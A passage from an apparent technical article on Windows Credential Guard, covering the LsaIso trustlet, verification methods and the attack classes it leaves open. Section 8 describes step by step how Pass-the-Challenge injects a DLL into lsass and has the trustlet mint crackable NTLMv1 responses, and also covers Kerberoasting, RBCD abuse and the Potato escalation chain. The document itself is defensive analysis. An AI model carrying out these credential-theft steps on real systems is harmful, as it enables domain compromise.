&lt;p&gt;The agent reaches the trustlet through a single secure-call endpoint named &lt;code&gt;LSA_ISO_RPC_SERVER&lt;/code&gt; (terminology per Lyak&apos;s writeup [@lyak-passchallenge-wayback]). The marshalling layer is the IUM Base API. The actual VTL boundary crossing is a hypercall: when a VTL0 thread invokes the secure call, the hypervisor switches the CPU to VTL1, the Secure Kernel inspects the call ordinal, copies the input buffer across the boundary into a VTL1-owned page, and dispatches to the trustlet&apos;s entry point. The reverse path mirrors that step for the return value.&lt;/p&gt;

The undocumented Windows IPC primitive that succeeds the older LPC. ALPC ports support multiple message-passing modes, fast handles, and direct shared-memory regions. In Credential Guard, the agent talks to the trustlet via an ALPC port whose server side is implemented inside the Secure Kernel, so that the IPC delivery path itself crosses the VTL boundary without exposing any VTL1 memory to VTL0. Lyak&apos;s Pass-the-Challenge writeup [@lyak-passchallenge-wayback] names the channel verbatim.
&lt;p&gt;This single endpoint is the entire externally-reachable surface of the trustlet. There is no debugger interface, no driver-load path, no shared-memory region, and no second ALPC port. The trustlet&apos;s code runs only when the agent calls it, and the agent can only call it through one specific channel that the Secure Kernel mediates.&lt;/p&gt;

sequenceDiagram
    participant SRV as Remote SMB server
    participant LSASS as &quot;lsass.exe (VTL0 -- msv1_0.dll)&quot;
    participant SK as &quot;securekernel.exe (VTL1 ring 0)&quot;
    participant ISO as &quot;LsaIso.exe (VTL1 trustlet)&quot;
    SRV-&amp;gt;&amp;gt;LSASS: NTLM challenge (8-byte server challenge)
    LSASS-&amp;gt;&amp;gt;SK: Secure call: NtlmIumCalculateNtResponse(ctxHandle, challenge)
    SK-&amp;gt;&amp;gt;SK: validate ordinal, copy input across VTL boundary
    SK-&amp;gt;&amp;gt;ISO: dispatch (NTOWF retrieved from sealed in-process state)
    ISO-&amp;gt;&amp;gt;ISO: Three-DES against the isolated NTOWF -- NTLMv1 DESL per MS-NLMP 3.3.1
    ISO-&amp;gt;&amp;gt;SK: derived 24-byte NTLMv1 response
    SK-&amp;gt;&amp;gt;LSASS: response (no NTOWF returned)
    LSASS-&amp;gt;&amp;gt;SRV: NTLMv1 response on the wire
&lt;h3&gt;5.5 The &lt;code&gt;MSV1_0\IsolatedCredentialsRootSecret&lt;/code&gt; registry sentinel&lt;/h3&gt;
&lt;p&gt;Microsoft documents one verifiable artefact of default-on Credential Guard activation: the registry value &lt;code&gt;Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\IsolatedCredentialsRootSecret&lt;/code&gt; [@ms-cg-overview]. Its presence on a Windows 11 22H2+ Pro / Pro Education box is the evidence that default-on activated the feature. A Pro Edu deployment that does not show this value either has Credential Guard explicitly disabled by policy, or sits on hardware that does not meet the requirements (no IOMMU, Secure Boot off, no virtualization extensions in firmware).&lt;/p&gt;
&lt;h3&gt;5.6 TPM binding and the VSM master key&lt;/h3&gt;
&lt;p&gt;Persistent state in Credential Guard is rare. The trustlet does not normally persist the NTOWF or TGT material across reboots; the next user logon re-derives both. When persistence is needed, the data is sealed under what Microsoft calls the &lt;em&gt;VSM master key&lt;/em&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;On recent supported hardware with TPM 2.0, VSM data that is persisted will be protected by a key called the &lt;em&gt;VSM master key&lt;/em&gt;, which is protected by device firmware protections. ... The VSM master key is protected by the TPM, ensuring that the key and secrets protected by Credential Guard can only be accessed in a trusted environment.&quot; [@ms-cg-howitworks]&lt;/p&gt;
&lt;/blockquote&gt;

A symmetric key, generated and stored only in VTL1, that wraps any persistent state the trustlets need to survive reboots. The VSM master key is itself sealed by the TPM under PCR-bound policy, so an attacker who pulls the disk and reboots into a different OS cannot unseal the VSM master key without also reproducing the platform&apos;s pristine measured boot state. See the companion TPM in Windows article [@paragmali-tpm] for the full seal / unseal primitive treatment.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Credential Guard removes the NT kernel from the TCB for the long-lived NTOWF and the Kerberos long-term keys, by moving them into a process whose pages no other VTL can map. The trustlet still answers queries about the keys; what changed is who can touch the bytes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Where the hash physically lives, in 2026, is in pages of &lt;code&gt;LsaIso.exe&lt;/code&gt; that the VTL0 NT kernel cannot map. What an attacker on a default-on Credential Guard box actually sees, what the verification surface for defenders is, and what the operational reality looks like in production is the next question.&lt;/p&gt;
&lt;h2&gt;6. The operational reality of default-on Credential Guard&lt;/h2&gt;
&lt;p&gt;Default-on means specifics. Specifically: every domain-joined Windows 11 22H2+ Enterprise / Education box that meets the hardware requirements has Virtualization-Based Security up, has &lt;code&gt;LsaIso.exe&lt;/code&gt; running, has the registry sentinel at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\IsolatedCredentialsRootSecret&lt;/code&gt; written, and reports &quot;Credential Guard&quot; in the running-services bitmask of &lt;code&gt;Win32_DeviceGuard&lt;/code&gt;. Pro and Pro Education boxes are not default-on targets; the special case where a Pro/Pro Edu device previously ran Credential Guard on Enterprise is the one path that lights it up there, and the registry sentinel from §5.5 is precisely how you detect that carry-over case.&lt;/p&gt;
&lt;h3&gt;Default-on scope and the no-UEFI-lock choice&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s Credential Guard overview page [@ms-cg-overview] is precise about scope: Windows 11 22H2 and later (Enterprise, Education), Windows Server 2025, domain-joined non-DC, hardware-eligible (Hyper-V Generation 2 VM with IOMMU on virtual hardware; UEFI Secure Boot and virtualization extensions required on physical hardware, with a TPM (1.2 or 2.0) and IOMMU recommended for additional protection). Pro and Pro Education hold the licence entitlement only via the Enterprise-to-Pro carry-over case. The default-on policy ships &quot;without UEFI Lock&quot; [@ms-cg-overview], which is a deliberate trade-off.&quot;Without UEFI Lock&quot; means an administrator can disable Credential Guard remotely (via Group Policy, Intune, or a registry change) without first sending someone to the box&apos;s UEFI menu. The trade-off: an attacker who has already obtained the level of privilege required to write the registry can also undo the same setting. Microsoft chose remote-disable convenience over the in-principle attacker-disable hardening because compatibility incidents -- a rolled-out third-party SSP that breaks under CG -- are an operational reality, and not being able to disable the feature remotely turns an SSP regression into a desk-side support ticket. The overview page [@ms-cg-overview] documents the rationale verbatim.&lt;/p&gt;
&lt;h3&gt;The three supported verification surfaces&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s configuration guide [@ms-cg-configure] names three supported ways to verify Credential Guard is running, and explicitly disrecommends a fourth:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;msinfo32&lt;/code&gt;&lt;/strong&gt;: opens the System Information UI; the line &quot;Virtualization-based Security Services Running&quot; includes &quot;Credential Guard&quot; when the trustlet is up.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;PowerShell &lt;code&gt;Get-CimInstance Win32_DeviceGuard&lt;/code&gt;&lt;/strong&gt;: returns a &lt;code&gt;SecurityServicesRunning&lt;/code&gt; array whose values are a bitmask.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;WinInit Event ID 13&lt;/strong&gt; in the System log: &quot;Credential Guard (LsaIso.exe) was started and will protect LSA credentials.&quot; [@ms-cg-configure]&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The disrecommended approach is &quot;look for &lt;code&gt;LsaIso.exe&lt;/code&gt; in Task Manager.&quot; Microsoft&apos;s words: &quot;Checking Task Manager if LsaIso.exe is running isn&apos;t a recommended method for determining whether Credential Guard is running.&quot; [@ms-cg-configure] Task Manager runs in VTL0 and queries an enumeration that an attacker who controls VTL0 can hide; the three supported surfaces all consult the hypervisor or the boot-time event log, neither of which a VTL0 attacker can edit.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Use the supported surfaces, not Task Manager. The PowerShell one-liner is &lt;code&gt;(Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning&lt;/code&gt;. The returned array contains &lt;code&gt;1&lt;/code&gt; when Credential Guard is running; &lt;code&gt;2&lt;/code&gt; denotes Hypervisor-Enforced Code Integrity (HVCI) per the broader &lt;code&gt;Win32_DeviceGuard&lt;/code&gt; schema [@learn-microsoft-com-code-integrity]. The corresponding WinInit Event IDs are 13 (Credential Guard started), 14 (configuration loaded), 15 (warning -- secure kernel not running), 16 (failed to launch), and 17 (UEFI configuration error), per the configuration guide [@ms-cg-configure].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;{`
// Mirrors what (Get-CimInstance Win32_DeviceGuard).SecurityServicesRunning returns.
// Microsoft&apos;s Win32_DeviceGuard documentation enumerates the values:
//   1 = Credential Guard
//   2 = Hypervisor-enforced Code Integrity (HVCI / Memory Integrity)
//   3 = System Guard Secure Launch
//   4 = SMM Firmware Measurement
//   5 = Kernel-mode Hardware-enforced Stack Protection
//   6 = Kernel-mode Hardware-enforced Stack Protection (Audit mode)
//   7 = Hypervisor-Enforced Paging Translation
// Note: MBEC (Mode-Based Execution Control) is a CPU capability advertised
// in the SEPARATE AvailableSecurityProperties array, not here.
const SECURITY_SERVICES = {
  1: &apos;Credential Guard&apos;,
  2: &apos;Hypervisor-enforced Code Integrity (HVCI)&apos;,
  3: &apos;System Guard Secure Launch&apos;,
  4: &apos;SMM Firmware Measurement&apos;,
  5: &apos;Kernel-mode Hardware-enforced Stack Protection&apos;,
  6: &apos;Kernel-mode Hardware-enforced Stack Protection (Audit mode)&apos;,
  7: &apos;Hypervisor-Enforced Paging Translation&apos;
};&lt;/p&gt;
&lt;p&gt;function describe(running) {
  if (!running.length) return &apos;No VBS services running&apos;;
  return running.map(v =&amp;gt; SECURITY_SERVICES[v] || (&apos;Unknown service id &apos; + v)).join(&apos;, &apos;);
}&lt;/p&gt;
&lt;p&gt;// On a default-on Windows 11 22H2+ domain-joined Pro/Enterprise box this returns:
console.log(describe([1, 2]));
// =&amp;gt; &quot;Credential Guard, Hypervisor-enforced Code Integrity (HVCI)&quot;&lt;/p&gt;
&lt;p&gt;// On a Windows 10 box without VBS enabled:
console.log(describe([]));
// =&amp;gt; &quot;No VBS services running&quot;
`}&lt;/p&gt;
&lt;h3&gt;What changes for the protocols&lt;/h3&gt;
&lt;p&gt;When Credential Guard is enabled, four SSPs lose the ability to use signed-in credentials: &quot;NTLMv1, MS-CHAPv2, Digest, and CredSSP can&apos;t use the signed-in credentials&quot; [@ms-cg-howitworks]. For NTLMv1 and Digest the practical effect is small (NTLMv1 is end-of-life [@paragmali-ntlmless]; Digest is essentially unused outside legacy HTTP digest authentication). For MS-CHAPv2 and CredSSP the effect is real: any single-sign-on path that depended on those protocols breaks with Credential Guard on. The considerations page [@ms-cg-considerations] calls out PEAP-MSCHAPv2 / EAP-MSCHAPv2 WiFi and VPN configurations explicitly: &quot;If you&apos;re using WiFi and VPN endpoints that are based on MS-CHAPv2, they&apos;re subject to similar attacks as for NTLMv1.&quot; [@ms-cg-considerations] The recommended remediation is to migrate the endpoints to PEAP-TLS / EAP-TLS (certificate-based authentication).&lt;/p&gt;
&lt;p&gt;For Kerberos, Credential Guard &quot;doesn&apos;t allow unconstrained Kerberos delegation or DES encryption, not only for signed-in credentials, but also prompted or saved credentials&quot; [@ms-cg-howitworks]. Constrained Delegation and Resource-Based Constrained Delegation continue to work. The remaining Kerberos &lt;code&gt;etype&lt;/code&gt; choices on the wire on a Credential Guard box are AES-128 and AES-256.&lt;/p&gt;
&lt;h3&gt;What doesn&apos;t change&lt;/h3&gt;
&lt;p&gt;The agent surface still exposes every SSP that loads inside &lt;code&gt;lsass.exe&lt;/code&gt;. The trustlet isolates the secret the SSP uses; it does not isolate the &lt;em&gt;parser&lt;/em&gt; that the SSP runs against an attacker-controlled wire format. A bug in &lt;code&gt;msv1_0.dll&lt;/code&gt;&apos;s NTLM parser is exactly as exploitable on a 2026 Credential-Guard-on box as it was on a 2015 Credential-Guard-off box. The trustlet does not guard the agent; the trustlet guards the key.&lt;/p&gt;

A VBS-based feature that uses the hypervisor&apos;s SLAT enforcement to ensure that any kernel-mode page that is executable is also signed and immutable, and any writable kernel-mode page is non-executable. HVCI closes the kernel-driver-loader leg of the BYOVD / PPL bypass class for *unsigned* drivers, but it does not close BYOVD against a signed-but-vulnerable driver. HVCI is orthogonal to Credential Guard; the overview page [@ms-cg-overview] recommends running both.
&lt;p&gt;Credential Guard is on; the surface is documented; the verification is one PowerShell line. So what other things claim to &quot;protect LSASS,&quot; and how do they fit together with Credential Guard?&lt;/p&gt;
&lt;h2&gt;7. The other things that &quot;protect LSASS&quot;&lt;/h2&gt;
&lt;p&gt;Six other things in the Microsoft security stack get called &quot;LSASS protection&quot; in someone&apos;s marketing. None of them is a substitute for Credential Guard. Most of them are complements. The difference matters because the choice between them is not a choice; the answer is &lt;em&gt;all of them, layered&lt;/em&gt;.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;Enforcement TCB&lt;/th&gt;
&lt;th&gt;Attacker bar to defeat&lt;/th&gt;
&lt;th&gt;Residual class it leaves open&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;LSA Protection (&lt;code&gt;RunAsPPL&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;NT kernel (signer-level lattice)&lt;/td&gt;
&lt;td&gt;Signed kernel driver (BYOVD via &lt;code&gt;mimidrv.sys&lt;/code&gt; [@itm4n-runasppl]); userland on legacy via PPLdump [@github-ppldump]&lt;/td&gt;
&lt;td&gt;Trustlet RPC outputs; non-LSA process credentials&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential Guard / &lt;code&gt;LsaIso.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Hypervisor + Secure Kernel + VTL1 trustlet&lt;/td&gt;
&lt;td&gt;Hypervisor escape; VTL1 code-execution bug&lt;/td&gt;
&lt;td&gt;Pass-the-Challenge [@lyak-passchallenge-wayback]; credential &lt;em&gt;use&lt;/em&gt;; tokens; supplied creds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HVCI / Memory Integrity&lt;/td&gt;
&lt;td&gt;Hypervisor-enforced kernel page W^X&lt;/td&gt;
&lt;td&gt;Signed-and-vulnerable driver that does not load arbitrary unsigned code&lt;/td&gt;
&lt;td&gt;Kernel-mode logic bugs in signed drivers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defender for Identity LSASS read-monitoring [@ms-defender-identity]&lt;/td&gt;
&lt;td&gt;Behavioural detection (no TCB)&lt;/td&gt;
&lt;td&gt;Stealth tradecraft that does not trip the canonical signatures&lt;/td&gt;
&lt;td&gt;Anything not yet patterned&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hello for Business&lt;/td&gt;
&lt;td&gt;Per-device TPM-bound asymmetric key (no shared secret on the wire)&lt;/td&gt;
&lt;td&gt;TPM compromise; on-device keylogger before sign-in&lt;/td&gt;
&lt;td&gt;Not a substitute -- it is what CG protects on cloud-joined boxes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Restricted Admin / Protected Users&lt;/td&gt;
&lt;td&gt;Protocol-level credential-delegation suppression&lt;/td&gt;
&lt;td&gt;Per-protocol; does not move where the secret lives&lt;/td&gt;
&lt;td&gt;Everything Credential Guard already covers, plus the four-hour TGT cap&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;LSA Protection&apos;s kernel-driver-loader bypass class is closed by HVCI for unsigned drivers but not for signed-and-vulnerable ones. Defender for Identity is a detection layer, not a TCB boundary. Hello for Business [@paragmali-com-hellos-hardwar] replaces the password with a TPM-bound asymmetric key [@ms-hello-business]: the Hello for Business overview [@ms-hello-business] row in the Security comparison table reads &quot;It uses &lt;strong&gt;key-based&lt;/strong&gt; or &lt;strong&gt;certificate-based&lt;/strong&gt; authentication. There&apos;s no symmetric secret (password) which can be stolen from a server or phished from a user and used remotely.&quot; The Microsoft Entra ID Primary Refresh Token (PRT) inside &lt;code&gt;cloudap.dll&lt;/code&gt; is the cloud-joined analogue of the on-prem trustlet model: the PRT itself is protected by the trustlet on Credential-Guard-enabled boxes, with Hello as the per-device long-term key chain. Restricted Admin and Protected Users [@ms-protected-users] suppress credential delegation at the protocol layer; on a Credential-Guard-on box they are &lt;em&gt;additionally&lt;/em&gt; effective because they remove the prompt path, but they are not a substitute for the storage-isolation primitive.&lt;/p&gt;

The structural model differs in interesting ways across general-purpose desktop operating systems. macOS uses the Apple Secure Enclave [@apple-secure-enclave]: a separate coprocessor &quot;isolated from the main processor&quot; running an Apple-customised L4 microkernel, with its own attestation chain and a constrained API surface that does not require a &quot;secure call&quot; from the application processor to be tunnelled through a trusted broker. Linux relies on the in-process Kerberos credential cache and per-user keyrings (KCM [@sssd-kcm], GNOME Keyring, KWallet); none of these provide kernel-bypass isolation by default, and the equivalent of &quot;dump LSASS&quot; is &quot;dump the user&apos;s keyring file plus the per-user master key from `~/.local/share/`.&quot; ChromeOS uses cryptohome [@chromium-cryptohome] plus per-user U2F keys, structurally close to the Hello-for-Business model. Windows is the only general-purpose desktop OS that combines a TPM-bound long-term key (Hello), a hypervisor-isolated derived-secret store (Credential Guard / LsaIso), and a behavioural detection layer (Defender for Identity). It is also the only one that accumulated the largest deployed base of password-equivalent secrets in process memory before it found the architectural answer.
&lt;p&gt;Credential Guard closes the storage class. Layering closes the adjacent classes. But there are five classes the layers cannot close -- five things Credential Guard was never going to close, by documented design. The next section enumerates each one.&lt;/p&gt;
&lt;h2&gt;8. The five things Credential Guard was never going to close&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s own &lt;em&gt;How Credential Guard works&lt;/em&gt; [@ms-cg-howitworks] page lists what Credential Guard &lt;em&gt;does not&lt;/em&gt; protect, in plain English. The list has five classes. Each class has a publicly disclosed worked example. Each worked example is in 2026 production attacker tradecraft. This is the honest accounting.&lt;/p&gt;
&lt;h3&gt;8.1 Pass-the-Challenge: the trustlet&apos;s RPC output as the new attack surface&lt;/h3&gt;
&lt;p&gt;On December 26, 2022, Oliver Lyak published Pass-the-Challenge [@lyak-passchallenge-wayback]. The technique is exactly the lesson of §5: the trustlet&apos;s pages are unreadable, but the trustlet&apos;s RPC output is exactly the response the attacker wants, and the attacker can ask for it.&lt;/p&gt;
&lt;p&gt;The attack flow, end to end:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The attacker has SYSTEM and &lt;code&gt;SeDebugPrivilege&lt;/code&gt; on a Credential-Guard-on box (any of the bypass paths from §3 still apply for getting to that point; Credential Guard does not change them).&lt;/li&gt;
&lt;li&gt;The attacker injects a security-package DLL named &lt;code&gt;SecurityPackage.dll&lt;/code&gt; (per the PassTheChallenge tool&apos;s source [@github-passthechallenge]) into &lt;code&gt;lsass.exe&lt;/code&gt;. Inside &lt;code&gt;lsass.exe&lt;/code&gt;, that DLL inherits the established ALPC channel to the trustlet, because it is now part of the agent.&lt;/li&gt;
&lt;li&gt;The attacker uses the Pypykatz fork [@github-pypykatz-ly4k] to extract the per-logon &lt;code&gt;Context Handle&lt;/code&gt; and &lt;code&gt;Proxy Info&lt;/code&gt; from the &lt;code&gt;[LSA Isolated Data]&lt;/code&gt; block of an existing user session.&lt;/li&gt;
&lt;li&gt;The attacker calls the trustlet&apos;s &lt;code&gt;NtlmIumCalculateNtResponse&lt;/code&gt; method through the established ALPC channel, supplying the &lt;code&gt;Context Handle&lt;/code&gt; and &quot;the static challenge &lt;code&gt;1122334455667788&lt;/code&gt;&quot; [@github-passthechallenge], the value historically used in pre-computed NTLMv1 rainbow tables and accepted by the &lt;code&gt;crack.sh&lt;/code&gt; [@lyak-passchallenge-wayback] cracking service.&lt;/li&gt;
&lt;li&gt;The trustlet faithfully returns the NTLMv1 response. No memory of the trustlet is read. No bug in the trustlet is exploited. The trustlet does what it was built to do.&lt;/li&gt;
&lt;li&gt;The attacker submits the response to &lt;code&gt;crack.sh&lt;/code&gt;. &quot;In less than a minute, I received an email from crack.sh stating that the NTLM hash was successfully recovered in 30 seconds: &lt;code&gt;65A13AB2FAEB5B700DE1A938AE5621CA&lt;/code&gt;.&quot; [@lyak-passchallenge-wayback]&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;There is also a v2 variant. Lyak: &quot;Another interesting option is to compute an NTLMv2 response using the LSAIso method &lt;code&gt;NtlmIumLm20GetNtlm3ChallengeResponse&lt;/code&gt;.&quot; [@lyak-passchallenge-wayback] The v2 variant uses an Impacket modification plus an AD CS [@lyak-passchallenge-wayback] Web Enrollment relay to obtain a certificate for the target user (Certipy&apos;s &lt;code&gt;Administrator&lt;/code&gt; certificate-based authentication path) without needing the cleartext NT hash at all.&lt;/p&gt;

sequenceDiagram
    participant ATT as Attacker (SYSTEM)
    participant LSASS as &quot;lsass.exe (VTL0) -- SecurityPackage.dll injected&quot;
    participant SK as &quot;securekernel.exe (VTL1 ring 0)&quot;
    participant ISO as &quot;LsaIso.exe (VTL1 trustlet)&quot;
    participant CRACK as crack.sh
    ATT-&amp;gt;&amp;gt;LSASS: Inject SecurityPackage.dll
    ATT-&amp;gt;&amp;gt;LSASS: Extract Context Handle from Pypykatz dump
    LSASS-&amp;gt;&amp;gt;SK: NtlmIumCalculateNtResponse(ctxHandle, 1122334455667788)
    SK-&amp;gt;&amp;gt;ISO: dispatch (signed-and-attested call)
    ISO-&amp;gt;&amp;gt;SK: 24-byte NTLMv1 response
    SK-&amp;gt;&amp;gt;LSASS: response
    LSASS-&amp;gt;&amp;gt;ATT: response (no NTOWF, just the ciphertext)
    ATT-&amp;gt;&amp;gt;CRACK: submit NTLMv1 ciphertext for 1122334455667788
    CRACK-&amp;gt;&amp;gt;ATT: NT hash recovered in ~30 seconds
&lt;p&gt;Microsoft&apos;s response landed in two phases. First, NTLMv1 was deprecated and disabled by default in Windows 11 24H2 / Server 2025 [@paragmali-ntlmless], which removes the &lt;code&gt;crack.sh&lt;/code&gt; rainbow-table leg specifically. Second, the trustlet stopped accepting NTLMv1 calls on the same builds. The &lt;em&gt;class&lt;/em&gt; -- &quot;use the trustlet to mint derived material&quot; -- remains structural to the agent / trustlet split, because closing it requires removing either the agent&apos;s ability to call the trustlet (which would defeat single-sign-on) or the attacker&apos;s ability to compromise the agent (which is the point of every other layer in the stack).&lt;/p&gt;

Pass-the-Challenge is not a Microsoft bug. It is a class property of any agent / trustlet split where the agent owns the protocol code. If `lsass.exe` could not call the trustlet, the trustlet would be useless: there would be no path from the wire challenge to a response. If `lsass.exe` *can* call the trustlet, then an attacker who compromises `lsass.exe` can call it too. Closing this gap structurally requires rewriting the SSP loading model so that protocol code, too, runs inside the trustlet -- which would put parsers for arbitrary attacker-controlled wire formats inside VTL1 and dramatically expand the trustlet TCB. Microsoft has not announced an intent to do that. The honest read of the architecture is that the storage surface is closed and the use surface is structurally open.
&lt;h3&gt;8.2 Credential &lt;em&gt;use&lt;/em&gt; without theft&lt;/h3&gt;
&lt;p&gt;Three named techniques in 2026 production tradecraft do not require reading the memory of any Credential-Guard-protected machine. They request derived material from the network and do offline cryptography on the response.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kerberoasting.&lt;/strong&gt; Tim Medin disclosed Kerberoasting at DerbyCon 4 in September 2014 [@irongeek-derbycon-medin] under the talk title &lt;em&gt;Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades&lt;/em&gt;. The mechanism, per the MITRE ATT&amp;amp;CK technique page [@attack-kerberoast]: any authenticated domain user requests a TGS-REP ticket for any registered Service Principal Name. &quot;Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.&quot; [@attack-kerberoast] The ticket arrives on the attacker&apos;s machine; the cracking happens on the attacker&apos;s GPUs; no memory of any Credential-Guard-protected box is ever read.&lt;/p&gt;

The class of attack in which any authenticated domain user requests a Kerberos TGS-REP ticket for any registered Service Principal Name and submits the encrypted portion of the response to offline cracking, recovering the service-account password if it is weak. Documented as MITRE ATT&amp;amp;CK T1558.003 [@attack-kerberoast]. Kerberoasting reads no memory of the targeted host; it consumes only network responses to entirely-legitimate Kerberos requests.
&lt;p&gt;&lt;strong&gt;AS-REP Roasting.&lt;/strong&gt; The same class for accounts with &lt;code&gt;DONT_REQ_PREAUTH&lt;/code&gt; set [@attack-asreproast]: the attacker requests a Kerberos AS-REP without sending preauthentication, the KDC returns a ticket portion encrypted with the user&apos;s long-term key, and the attacker cracks offline.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Resource-Based Constrained Delegation (RBCD).&lt;/strong&gt; Originally described by Elad Shamir in &lt;em&gt;Wagging the Dog&lt;/em&gt; (January 2019) [@shenanigans-wagging-dog]; refined by James Forshaw&apos;s &quot;Exploiting RBCD using a normal user&quot; (May 2022) [@tiraniddo-rbcd]; turned into a turnkey LPE by Dec0ne&apos;s KrbRelayUp (2022) [@github-krbrelayup], which the README describes -- accurately -- as &quot;essentially a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).&quot; [@github-krbrelayup] The attack abuses the &lt;code&gt;msDS-AllowedToActOnBehalfOfOtherIdentity&lt;/code&gt; LDAP attribute: if the attacker can write that attribute on a target computer object, they can mint a Kerberos service ticket &lt;em&gt;as anyone&lt;/em&gt; against the target. Forshaw&apos;s 2022 contribution removed the precondition that the attacker must control a computer account (it used to require a &lt;code&gt;MachineAccountQuota&lt;/code&gt;-bypass); after Forshaw, &lt;em&gt;any&lt;/em&gt; authenticated domain user with write access to the attribute is enough.&lt;/p&gt;

A Kerberos delegation feature in which the resource (server) lists which principals are allowed to delegate to it via the `msDS-AllowedToActOnBehalfOfOtherIdentity` LDAP attribute on the resource&apos;s computer object. RBCD enables S4U2Self and S4U2Proxy chains where the configured principal can request a service ticket *as any user* against the resource, including Domain Administrators. Abuse documented in Wagging the Dog [@shenanigans-wagging-dog], refined in tiraniddo.dev [@tiraniddo-rbcd], and weaponised in KrbRelayUp [@github-krbrelayup].
&lt;h3&gt;8.3 The SeImpersonatePrivilege Potato chain&lt;/h3&gt;
&lt;p&gt;The Potato family [@paragmali-com-on-the] is a chain of escalations from a low-privilege service user (anyone with &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; or &lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt;) to NT AUTHORITY\SYSTEM. The chain starts with Hot Potato (Stephen Breen, January 16, 2016) [@foxglove-hot-potato]: NBNS spoofing plus WPAD plus HTTP-to-SMB NTLM relay. The &lt;code&gt;breenmachine&lt;/code&gt; writeup [@foxglove-hot-potato] is verbatim: &quot;Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP-&amp;gt;SMB relay) and NBNS spoofing.&quot; [@foxglove-hot-potato]&lt;/p&gt;
&lt;p&gt;Rotten Potato (Breen + Chris Mallz, September 26, 2016) [@foxglove-rotten-potato] replaced the NBNS / WPAD / WSUS triggering with a synthesised DCOM round-trip via &lt;code&gt;CoGetInstanceFromIStorage&lt;/code&gt; against the BITS CLSID &lt;code&gt;4991d34b-80a1-4291-83b6-3328366b9097&lt;/code&gt; over a local TCP port, achieving 100% reliability across Windows versions. Juicy Potato (Andrea Pierini &lt;code&gt;@ohpe&lt;/code&gt; + Claudio Tenaglia &lt;code&gt;@decoder_it&lt;/code&gt;, August 2018) [@github-juicy-potato] made the CLSID a parameter, dropping the BITS-on-port-6666 hardcoding. PrintSpoofer (itm4n, May 2, 2020) [@itm4n-printspoofer] replaced the DCOM coercion with a Print Spooler named-pipe coercion, surviving Microsoft&apos;s Server 2019 / Windows 10 19H1 mitigations against the DCOM-based predecessors.&lt;/p&gt;

The Windows token privilege that allows a process to call `ImpersonateLoggedOnUser` against a token obtained from another security context. Service accounts (`NT AUTHORITY\NETWORK SERVICE`, IIS app pool identities, MSSQL service accounts) hold this privilege by default. As `decoder_it` first observed [@itm4n-printspoofer], if you have `SeAssignPrimaryToken` or `SeImpersonate` privilege, you are SYSTEM: combine it with a coerced inbound NTLM authentication from `NT AUTHORITY\SYSTEM` to a local listener, and `CreateProcessWithToken` finishes the chain.
&lt;p&gt;The Potato chain exploits &lt;em&gt;tokens&lt;/em&gt;, not credentials. The chain of Hot / Rotten / Juicy / PrintSpoofer / RoguePotato / GodPotato has been continuous since January 2016 because every link in the chain abuses a Windows OS feature (DCOM marshalling, RPC, named-pipe impersonation, Print Spooler, COM activation through alternative interfaces) that has a legitimate use case Microsoft cannot remove. Credential Guard does not protect tokens; Credential Guard protects credentials.&lt;/p&gt;
&lt;h3&gt;8.4 Plaintext-secret protocols and supplied credentials&lt;/h3&gt;
&lt;p&gt;&quot;When Credential Guard is enabled, NTLMv1, MS-CHAPv2, Digest, and CredSSP can&apos;t use the signed-in credentials&quot; [@ms-cg-howitworks], but they &lt;em&gt;can&lt;/em&gt; still be used with prompted or saved credentials. In every such case the cleartext password (or a symmetric secret derived from it) is supplied to &lt;code&gt;lsass.exe&lt;/code&gt; from outside the trustlet, so the trustlet has nothing to protect at the moment of use.&lt;/p&gt;
